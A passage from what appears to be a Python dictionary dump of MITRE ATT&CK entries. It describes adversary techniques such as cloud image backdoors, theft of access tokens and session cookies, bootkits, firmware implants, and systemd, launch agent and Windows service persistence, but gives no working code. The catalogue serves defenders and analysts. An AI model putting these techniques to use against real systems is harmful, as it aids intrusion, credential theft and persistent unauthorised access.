                          'persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon '
                          'Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as '
                          'popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload '
                          'Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on '
                          'adversaries implanting an image in a registry within a victim’s environment. Depending on '
                          'how the infrastructure is provisioned, this could provide persistent access if the '
                          'infrastructure provisioning tool is instructed to always use the latest image.(Citation: '
                          'Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n'
                          '\n'
                          'A tool has been developed to facilitate planting backdoors in cloud container '
                          'images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a '
                          'compromised AWS instance, and permissions to list the available container images, they may '
                          'implant a backdoor such as a [Web '
                          'Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image '
                          'Backdoor Technique Sept 2019)',
           'name': 'Implant Internal Image',
           'platforms': ['IaaS', 'Containers']},
 'T1526': {'attack_id': 'T1526',
           'categories': ['discovery'],
           'description': 'An adversary may attempt to enumerate the cloud services running on a system after gaining '
                          'access. These methods can differ from platform-as-a-service (PaaS), to '
                          'infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist '
                          'throughout the various cloud providers and can include Continuous Integration and '
                          'Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include '
                          'security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging '
                          'services, such as AWS CloudTrail and Google Cloud Audit Logs.\n'
                          '\n'
                          'Adversaries may attempt to discover information about the services enabled throughout the '
                          'environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource '
                          'Manager API, can enumerate resources and services, including applications, management '
                          'groups, resources and policy definitions, and their relationships that are accessible by an '
                          'identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n'
                          '\n'
                          'For example, Stormspotter is an open source tool for enumerating and constructing a graph '
                          'for Azure resources and services, and Pacu is an open source AWS exploitation framework '
                          'that supports several methods for discovering cloud services.(Citation: Azure - '
                          'Stormspotter)(Citation: GitHub Pacu)\n'
                          '\n'
                          'Adversaries may use the information gained to shape follow-on behaviors, such as targeting '
                          'data or credentials from enumerated services or evading identified defenses through '
                          '[Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or '
                          'Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).',
           'name': 'Cloud Service Discovery',
           'platforms': ['Azure AD', 'Office 365', 'SaaS', 'IaaS', 'Google Workspace']},
 'T1528': {'attack_id': 'T1528',
           'categories': ['credential-access'],
           'description': 'Adversaries can steal application access tokens as a means of acquiring credentials to '
                          'access remote systems and resources.\n'
                          '\n'
                          'Application access tokens are used to make authorized API requests on behalf of a user or '
                          'service and are commonly used as a way to access resources in cloud and container-based '
                          'applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use '
                          'Access Tokens to Secure APIs Sept 2019)  Adversaries who steal account API tokens in cloud '
                          'and containerized environments may be able to access data and perform actions with the '
                          'permissions of these accounts, which can lead to privilege escalation and further '
                          'compromise of the environment.\n'
                          '\n'
                          'For example, in Kubernetes environments, processes running inside a container may '
                          'communicate with the Kubernetes API server using service account tokens. If a container is '
                          'compromised, an adversary may be able to steal the container’s token and thereby gain '
                          'access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)  Similarly, '
                          'instances within continuous-development / continuous-integration (CI/CD) pipelines will '
                          'often use API tokens to authenticate to other services for testing and '
                          'deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are '
                          'compromised, adversaries may be able to steal these tokens and leverage their privileges.\n'
                          '\n'
                          'Token theft can also occur through social engineering, in which case user action may be '
                          'required to grant access. OAuth is one commonly implemented framework that issues tokens to '
                          'users for access to systems. An application desiring access to cloud-based services or '
                          'protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. '
                          "An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: "
                          'Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code '
                          'Authorization flow - June 2019) An OAuth access token enables a third-party application to '
                          'interact with resources containing user data in the ways requested by the application '
                          'without obtaining user credentials. \n'
                          ' \n'
                          'Adversaries can leverage OAuth authorization by constructing a malicious application '
                          "designed to be granted access to resources with the target user's OAuth token.(Citation: "
                          'Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) '
                          'The adversary will need to complete registration of their application with the '
                          'authorization server, for example Microsoft Identity Platform using Azure Portal, the '
                          'Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: '
                          'Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing '
                          'Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to '
                          'grant access to the application. Once the OAuth access token is granted, the application '
                          'can gain potentially long-term access to features of the user account through [Application '
                          'Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure '
                          'AD Identity Tokens - Aug 2019)\n'
                          '\n'
                          'Application access tokens may function within a limited lifetime, limiting how long an '
                          'adversary can utilize the stolen token. However, in some cases, adversaries can also steal '
                          'application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to '
                          'obtain new access tokens without prompting the user.  \n'
                          '\n',
           'name': 'Steal Application Access Token',
           'platforms': ['SaaS', 'Office 365', 'Azure AD', 'Google Workspace', 'Containers']},
 'T1529': {'attack_id': 'T1529',
           'categories': ['impact'],
           'description': 'Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction '
                          'of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of '
                          'a machine or network device. In some cases, these commands may also be used to initiate a '
                          'shutdown/reboot of a remote computer or network device via [Network Device '
                          'CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: '
                          'Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)\n'
                          '\n'
                          'Shutting down or rebooting systems may disrupt access to computer resources for legitimate '
                          'users while also impeding incident response/recovery.\n'
                          '\n'
                          'Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such '
                          'as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System '
                          'Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on '
                          'system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer '
                          '2018)',
           'name': 'System Shutdown/Reboot',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1530': {'attack_id': 'T1530',
           'categories': ['collection'],
           'description': 'Adversaries may access data from cloud storage.\n'
                          '\n'
                          'Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure '
                          'Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 '
                          'and Google Workspace provide cloud-based document storage to users through services such as '
                          'OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, '
                          'Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use '
                          'case of their platform. \n'
                          '\n'
                          'In some cases, as with IaaS-based cloud storage, there exists no overarching application '
                          '(such as SQL or Elasticsearch) with which to interact with the stored objects: instead, '
                          'data from these solutions is retrieved directly though the [Cloud '
                          'API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications, adversaries may '
                          'be able to collect this data directly from APIs or backend cloud storage objects, rather '
                          'than through their front-end application or interface (i.e., [Data from Information '
                          'Repositories](https://attack.mitre.org/techniques/T1213)). \n'
                          '\n'
                          'Adversaries may collect sensitive data from these cloud storage solutions. Providers '
                          'typically offer security guides to help end users configure systems, though '
                          'misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: '
                          'Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, '
                          '2019) There have been numerous incidents where cloud storage has been improperly secured, '
                          'typically by unintentionally allowing public access to unauthenticated users, overly-broad '
                          'access by all users, or even access for any anonymous person outside the control of the '
                          'Identity Access Management system without even needing basic user permissions.\n'
                          '\n'
                          'This open access may expose various types of sensitive data, such as credit cards, '
                          'personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed '
                          'PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, '
                          '2017)(Citation: Rclone-mega-extortion_05_2021)\n'
                          '\n'
                          'Adversaries may also obtain then abuse leaked credentials from source repositories, logs, '
                          'or other means as a way to gain access to cloud storage objects.',
           'name': 'Data from Cloud Storage',
           'platforms': ['IaaS', 'SaaS', 'Google Workspace', 'Office 365']},
 'T1531': {'attack_id': 'T1531',
           'categories': ['impact'],
           'description': 'Adversaries may interrupt availability of system and network resources by inhibiting access '
                          'to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated '
                          '(ex: changed credentials) to remove access to accounts. Adversaries may also subsequently '
                          'log off and/or perform a [System '
                          'Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into '
                          'place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)\n'
                          '\n'
                          'In Windows, [Net](https://attack.mitre.org/software/S0039) utility, '
                          '<code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> '
                          '[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by '
                          'adversaries to modify user accounts. In Linux, the <code>passwd</code> utility may be used '
                          'to change passwords. Accounts could also be disabled by Group Policy. \n'
                          '\n'
                          'Adversaries who use ransomware or similar attacks may first perform this and other Impact '
                          'behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and '
                          '[Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident '
                          'response/recovery before completing the [Data Encrypted for '
                          'Impact](https://attack.mitre.org/techniques/T1486) objective. ',
           'name': 'Account Access Removal',
           'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'SaaS']},
 'T1532': {'attack_id': 'T1532',
           'categories': ['collection'],
           'description': 'Adversaries may compress and/or encrypt data that is collected prior to exfiltration. '
                          'Compressing data can help to obfuscate its contents and minimize use of network resources. '
                          'Encryption can be used to hide information that is being exfiltrated from detection or make '
                          'exfiltration less conspicuous upon inspection by a defender. \n'
                          '\n'
                          ' \n'
                          '\n'
                          'Both compression and encryption are done prior to exfiltration, and can be performed using '
                          'a utility, programming library, or custom algorithm.  ',
           'name': 'Archive Collected Data',
           'platforms': ['Android', 'iOS']},
 'T1533': {'attack_id': 'T1533',
           'categories': ['collection'],
           'description': 'Adversaries may search local system sources, such as file systems or local databases, to '
                          'find files of interest and sensitive data prior to exfiltration.  \n'
                          '\n'
                          ' \n'
                          '\n'
                          'Access to local system data, which includes information stored by the operating system, '
                          'often requires escalated privileges. Examples of local system data include authentication '
                          'tokens, the device keyboard cache, Wi-Fi passwords, and photos. On Android, adversaries may '
                          'also attempt to access files from external storage which may require additional '
                          'storage-related permissions. \n'
                          '\n'
                          ' ',
           'name': 'Data from Local System',
           'platforms': ['Android', 'iOS']},
 'T1534': {'attack_id': 'T1534',
           'categories': ['lateral-movement'],
           'description': 'After they already have access to accounts or systems within the environment, adversaries '
                          'may use internal spearphishing to gain access to additional information or compromise other '
                          'users within the same organization. Internal spearphishing is multi-staged campaign where a '
                          "legitimate account is initially compromised either by controlling the user's device or by "
                          'compromising the account credentials of the user. Adversaries may then attempt to take '
                          'advantage of the trusted internal account to increase the likelihood of tricking more '
                          'victims into falling for phish attempts, often incorporating '
                          '[Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int '
                          'SP)\n'
                          '\n'
                          'For example, adversaries may leverage [Spearphishing '
                          'Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing '
                          'Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to '
                          'deliver a payload or redirect to an external site to capture credentials through [Input '
                          'Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.\n'
                          '\n'
                          'Adversaries may also leverage internal chat apps, such as Microsoft Teams, to spread '
                          'malicious content or engage users in attempts to capture sensitive information and/or '
                          'credentials.(Citation: Int SP - chat apps)',
           'name': 'Internal Spearphishing',
           'platforms': ['Windows', 'macOS', 'Linux', 'Office 365', 'SaaS', 'Google Workspace']},
 'T1535': {'attack_id': 'T1535',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may create cloud instances in unused geographic service regions in order to '
                          'evade detection. Access is usually obtained through compromising accounts used to manage '
                          'cloud infrastructure.\n'
                          '\n'
                          'Cloud service providers often provide infrastructure throughout the world in order to '
                          'improve performance, provide redundancy, and allow customers to meet compliance '
                          'requirements. Oftentimes, a customer will only use a subset of the available regions and '
                          'may not actively monitor other regions. If an adversary creates resources in an unused '
                          'region, they may be able to operate undetected.\n'
                          '\n'
                          'A variation on this behavior takes advantage of differences in functionality across cloud '
                          'regions. An adversary could utilize regions which do not support advanced detection '
                          'services in order to avoid detection of their activity.\n'
                          '\n'
                          'An example of adversary use of unused AWS regions is to mine cryptocurrency through '
                          '[Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost '
                          'organizations substantial amounts of money over time depending on the processing power '
                          'used.(Citation: CloudSploit - Unused AWS Regions)',
           'name': 'Unused/Unsupported Cloud Regions',
           'platforms': ['IaaS']},
 'T1537': {'attack_id': 'T1537',
           'categories': ['exfiltration'],
           'description': 'Adversaries may exfiltrate data by transferring the data, including through sharing/syncing '
                          'and creating backups of cloud environments, to another cloud account they control on the '
                          'same service.\n'
                          '\n'
                          'A defender who is monitoring for large transfers to outside the cloud environment through '
                          'normal file transfers or over command and control channels may not be watching for data '
                          'transfers to another account within the same cloud provider. Such transfers may utilize '
                          'existing cloud provider APIs and the internal address space of the cloud provider to blend '
                          'into normal traffic or avoid data transfers over external network interfaces.(Citation: '
                          'TLDRSec AWS Attacks)\n'
                          '\n'
                          'Adversaries may also use cloud-native mechanisms to share victim data with '
                          'adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in '
                          'Azure, a shared access signature (SAS) URI.(Citation: Microsoft Azure Storage Shared Access '
                          'Signature)\n'
                          '\n'
                          'Incidents have been observed where adversaries have created backups of cloud instances and '
                          'transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) ',
           'name': 'Transfer Data to Cloud Account',
           'platforms': ['IaaS', 'SaaS', 'Google Workspace', 'Office 365']},
 'T1538': {'attack_id': 'T1538',
           'categories': ['discovery'],
           'description': 'An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful '
                          'information from an operational cloud environment, such as specific services, resources, '
                          'and features. For example, the GCP Command Center can be used to view all assets, findings '
                          'of potential security risks, and to run additional queries, such as finding public IP '
                          'addresses and open ports.(Citation: Google Command Center Dashboard)\n'
                          '\n'
                          'Depending on the configuration of the environment, an adversary may be able to enumerate '
                          'more information via the graphical dashboard than an API. This allows the adversary to gain '
                          'information without making any API requests.',
           'name': 'Cloud Service Dashboard',
           'platforms': ['Azure AD', 'Office 365', 'IaaS', 'Google Workspace', 'SaaS']},
 'T1539': {'attack_id': 'T1539',
           'categories': ['credential-access'],
           'description': 'An adversary may steal web application or service session cookies and use them to gain '
                          'access to web applications or Internet services as an authenticated user without needing '
                          'credentials. Web applications and services often use session cookies as an authentication '
                          'token after a user has authenticated to a website.\n'
                          '\n'
                          'Cookies are often valid for an extended period of time, even if the web application is not '
                          'actively used. Cookies can be found on disk, in the process memory of the browser, and in '
                          'network traffic to remote systems. Additionally, other applications on the targets machine '
                          'might store sensitive authentication cookies in memory (e.g. apps which authenticate to '
                          'cloud services). Session cookies can be used to bypasses some multi-factor authentication '
                          'protocols.(Citation: Pass The Cookie)\n'
                          '\n'
                          'There are several examples of malware targeting cookies from web browsers on the local '
                          'system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies '
                          'January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content '
                          'into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by '
                          'tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox '
                          'Scam 2023)(Citation: Krebs Discord Bookmarks 2023)\n'
                          '\n'
                          'There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather '
                          'session cookies through a malicious proxy (e.g., '
                          '[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by '
                          'an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub '
                          'Mauraena)\n'
                          '\n'
                          'After an adversary acquires a valid cookie, they can then perform a [Web Session '
                          'Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the '
                          'corresponding web application.',
           'name': 'Steal Web Session Cookie',
           'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'SaaS', 'Google Workspace']},
 'T1541': {'attack_id': 'T1541',
           'categories': ['defense-evasion', 'persistence'],
           'description': "Adversaries may abuse Android's `startForeground()` API method to maintain continuous "
                          'sensor access. Beginning in Android 9, idle applications running in the background no '
                          'longer have access to device sensors, such as the camera, microphone, and '
                          'gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by '
                          'running in the foreground, using Android’s `startForeground()` API method. This informs the '
                          'system that the user is actively interacting with the application, and it should not be '
                          'killed. The only requirement to start a foreground service is showing a persistent '
                          'notification to the user.(Citation: Android-ForegroundServices)\n'
                          '\n'
                          'Malicious applications may abuse the `startForeground()` API method to continue running in '
                          'the foreground, while presenting a notification to the user pretending to be a genuine '
                          'application. This would allow unhindered access to the device’s sensors, assuming '
                          'permission has been previously granted.(Citation: BlackHat Sutter Android Foreground 2019)\n'
                          '\n'
                          'Malicious applications may also abuse the `startForeground()` API to inform the Android '
                          'system that the user is actively interacting with the application, thus preventing it from '
                          'being killed by the low memory killer.(Citation: TrendMicro-Yellow Camera)',
           'name': 'Foreground Persistence',
           'platforms': ['Android']},
 'T1542': {'attack_id': 'T1542',
           'categories': ['defense-evasion', 'persistence'],
           'description': 'Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. '
                          'During the booting process of a computer, firmware and various startup services are loaded '
                          'before the operating system. These programs control flow of execution before the operating '
                          'system takes control.(Citation: Wikipedia Booting)\n'
                          '\n'
                          'Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output '
                          'System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a '
                          'layer below the operating system. This can be particularly difficult to detect as malware '
                          'at this level will not be detected by host software-based defenses.',
           'name': 'Pre-OS Boot',
           'platforms': ['Linux', 'Windows', 'Network', 'macOS']},
 'T1542.001': {'attack_id': 'T1542.001',
               'categories': ['persistence', 'defense-evasion'],
               'description': 'Adversaries may modify system firmware to persist on systems.The BIOS (Basic '
                              'Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible '
                              'Firmware Interface (EFI) are examples of system firmware that operate as the software '
                              'interface between the operating system and hardware of a computer.(Citation: Wikipedia '
                              'BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)\n'
                              '\n'
                              'System firmware like BIOS and (U)EFI underly the functionality of a computer and may be '
                              'modified by an adversary to perform or assist in malicious activity. Capabilities exist '
                              'to overwrite the system firmware, which may give sophisticated adversaries a means to '
                              'install malicious firmware updates as a means of persistence on a system that may be '
                              'difficult to detect.',
               'name': 'System Firmware',
               'platforms': ['Windows', 'Network']},
 'T1542.002': {'attack_id': 'T1542.002',
               'categories': ['persistence', 'defense-evasion'],
               'description': 'Adversaries may modify component firmware to persist on systems. Some adversaries may '
                              'employ sophisticated means to compromise computer components and install malicious '
                              'firmware that will execute adversary code outside of the operating system and main '
                              'system firmware or BIOS. This technique may be similar to [System '
                              'Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other '
                              'system components/devices that may not have the same capability or level of integrity '
                              'checking.\n'
                              '\n'
                              'Malicious component firmware could provide both a persistent level of access to systems '
                              'despite potential typical failures to maintain access and hard disk re-images, as well '
                              'as a way to evade host software-based defenses and integrity checks.',
               'name': 'Component Firmware',
               'platforms': ['Windows', 'Linux', 'macOS']},
 'T1542.003': {'attack_id': 'T1542.003',
               'categories': ['persistence', 'defense-evasion'],
               'description': 'Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below '
                              'the operating system and may make it difficult to perform full remediation unless an '
                              'organization suspects one was used and can act accordingly.\n'
                              '\n'
                              'A bootkit is a malware variant that modifies the boot sectors of a hard drive, '
                              'including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: '
                              'Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after '
                              'completing hardware initialization by the BIOS. It is the location of the boot loader. '
                              'An adversary who has raw access to the boot drive may overwrite this area, diverting '
                              'execution during startup from the normal boot loader to adversary code. (Citation: Lau '
                              '2011)\n'
                              '\n'
                              'The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an '
                              'adversary who has raw access to the boot drive may overwrite the VBR to divert '
                              'execution during startup to adversary code.',
               'name': 'Bootkit',
               'platforms': ['Linux', 'Windows']},
 'T1542.004': {'attack_id': 'T1542.004',
               'categories': ['defense-evasion', 'persistence'],
               'description': 'Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with '
                              'adversary code to provide persistent access and manipulate device behavior that is '
                              'difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog '
                              'Legacy Device Attacks)\n'
                              '\n'
                              '\n'
                              'ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, '
                              'or boot helper to initialize hardware and software when the platform is powered on or '
                              'reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an '
                              'adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) '
                              'with adversary code and restart the device in order to overwrite the existing ROMMON '
                              'image. This provides adversaries with the means to update the ROMMON to gain '
                              'persistence on a system in a way that may be difficult to detect.',
               'name': 'ROMMONkit',
               'platforms': ['Network']},
 'T1542.005': {'attack_id': 'T1542.005',
               'categories': ['defense-evasion', 'persistence'],
               'description': 'Adversaries may abuse netbooting to load an unauthorized network device operating '
                              'system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is '
                              'commonly used by network administrators to load configuration-controlled network device '
                              'images from a centralized management server. Netbooting is one option in the boot '
                              'sequence and can be used to centralize, manage, and control device images.\n'
                              '\n'
                              'Adversaries may manipulate the configuration on the network device specifying use of a '
                              'malicious TFTP server, which may be used in conjunction with [Modify System '
                              'Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device '
                              'startup or reset. The unauthorized image allows adversaries to modify device '
                              'configuration, add malicious capabilities to the device, and introduce backdoors to '
                              'maintain control of the network device while minimizing detection through use of a '
                              'standard functionality. This technique is similar to '
                              '[ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the '
                              'network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)',
               'name': 'TFTP Boot',
               'platforms': ['Network']},
 'T1543': {'attack_id': 'T1543',
           'categories': ['persistence', 'privilege-escalation'],
           'description': 'Adversaries may create or modify system-level processes to repeatedly execute malicious '
                          'payloads as part of persistence. When operating systems boot up, they can start processes '
                          'that perform background system functions. On Windows and Linux, these system processes are '
                          'referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as '
                          '[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch '
                          'Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system '
                          'initialization and load user specific parameters.(Citation: AppleDocs Launch Agent '
                          'Daemons) \n'
                          '\n'
                          'Adversaries may install new services, daemons, or agents that can be configured to execute '
                          'at startup or a repeatable interval in order to establish persistence. Similarly, '
                          'adversaries may modify existing services, daemons, or agents to achieve the same effect.  \n'
                          '\n'
                          'Services, daemons, or agents may be created with administrator privileges but executed '
                          'under root/SYSTEM privileges. Adversaries may leverage this functionality to create or '
                          'modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)  ',
           'name': 'Create or Modify System Process',
           'platforms': ['Windows', 'macOS', 'Linux', 'Containers']},
 'T1543.001': {'attack_id': 'T1543.001',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may create or modify launch agents to repeatedly execute malicious payloads '
                              'as part of persistence. When a user logs in, a per-user launchd process is started '
                              'which loads the parameters for each launch-on-demand user agent from the property list '
                              '(.plist) file found in <code>/System/Library/LaunchAgents</code>, '
                              '<code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.(Citation: '
                              'AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated '
                              'Mac Malware) Property list files use the <code>Label</code>, <code>ProgramArguments '
                              "</code>, and <code>RunAtLoad</code> keys to identify the Launch Agent's name, "
                              'executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are '
                              'often installed to perform updates to programs, launch user specified programs at '
                              'login, or to conduct other developer tasks.\n'
                              '\n'
                              ' Launch Agents can also be executed using the '
                              '[Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\n'
                              ' \n'
                              'Adversaries may install a new Launch Agent that executes at login by placing a .plist '
                              'file into the appropriate folders with the <code>RunAtLoad</code> or '
                              '<code>KeepAlive</code> keys set to <code>true</code>.(Citation: Sofacy Komplex '
                              'Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be '
                              'disguised by using a name from the related operating system or benign software. Launch '
                              'Agents are created with user level privileges and execute with user level '
                              'permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ',
               'name': 'Launch Agent',
               'platforms': ['macOS']},
 'T1543.002': {'attack_id': 'T1543.002',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may create or modify systemd services to repeatedly execute malicious '
                              'payloads as part of persistence. Systemd is a system and service manager commonly used '
                              'for managing background daemon processes (also known as services) and other system '
                              'resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default '
                              'initialization (init) system on many Linux distributions replacing legacy init systems, '
                              'including SysVinit and Upstart, while remaining backwards compatible.  \n'
                              '\n'
                              'Systemd utilizes unit configuration files with the `.service` file extension to encode '
                              "information about a service's process. By default, system level unit files are stored "
                              'in the `/systemd/system` directory of the root owned directories (`/`). User level unit '
                              'files are stored in the `/systemd/user` directories of the user owned directories '
                              '(`$HOME`).(Citation: lambert systemd 2022) \n'
                              '\n'
                              'Inside the `.service` unit files, the following directives are used to execute '
                              'commands:(Citation: freedesktop systemd.service)  \n'
                              '\n'
                              '* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is '
                              'started manually by `systemctl` or on system start if the service is set to '
                              'automatically start.\n'
                              '* `ExecReload` directive executes when a service restarts. \n'
                              '* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is '
                              'stopped.  \n'
                              '\n'
                              'Adversaries have created new service files, altered the commands a `.service` file’s '
                              'directive executes, and modified the user directive a `.service` file executes as, '
                              'which could result in privilege escalation. Adversaries may also place symbolic links '
                              'in these directories, enabling systemd to find these payloads regardless of where they '
                              'reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk '
                              'backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) \n'
                              '\n'
                              'The .service file’s User directive can be used to run service as a specific user, which '
                              'could result in privilege escalation based on specific user/group permissions. ',
               'name': 'Systemd Service',
               'platforms': ['Linux']},
 'T1543.003': {'attack_id': 'T1543.003',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may create or modify Windows services to repeatedly execute malicious '
                              'payloads as part of persistence. When Windows boots up, it starts programs or '
                              'applications called services that perform background system functions.(Citation: '
                              'TechNet Services) Windows service configuration information, including the file path to '
                              "the service's executable or recovery programs/commands, is stored in the Windows "
                              'Registry.\n'
                              '\n'
                              'Adversaries may install a new service or modify an existing service to execute at '
                              'startup in order to persist on a system. Service configurations can be set or modified '
                              'using system utilities (such as sc.exe), by directly modifying the Registry, or by '
                              'interacting directly with the Windows API. \n'
                              '\n'
                              'Adversaries may also use services to install and execute malicious drivers. For '
                              'example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded '
                              'and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions '
                              'such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and '
                              '`ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify '
                              'Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line '
                              'utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: '
                              'Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries '
                              'may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to '
                              'hide the presence of malicious activity on a system. Adversaries may also load a signed '
                              'yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable '
                              'Driver" (BYOVD)) as part of [Exploitation for Privilege '
                              'Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June '
                              '2020)(Citation: Unit42 AcidBox June 2020)\n'
                              '\n'
                              'Services may be created with administrator privileges but are executed under SYSTEM '
                              'privileges, so an adversary may also use a service to escalate privileges. Adversaries '
                              'may also directly start services through [Service '
                              'Execution](https://attack.mitre.org/techniques/T1569/002).\n'
                              '\n'
                              'To make detection analysis more challenging, malicious services may also incorporate '
                              '[Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using '
                              'a service and/or payload name related to a legitimate OS or benign software component). '
                              'Adversaries may also create ‘hidden’ services (i.e., [Hide '
                              'Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc '
                              'sdset` command to set service permissions via the Service Descriptor Definition '
                              'Language (SDDL). This may hide a Windows service from the view of standard service '
                              'enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: '
                              'SANS 1)(Citation: SANS 2)',
               'name': 'Windows Service',
               'platforms': ['Windows']},
 'T1543.004': {'attack_id': 'T1543.004',
               'categories': ['persistence', 'privilege-escalation'],
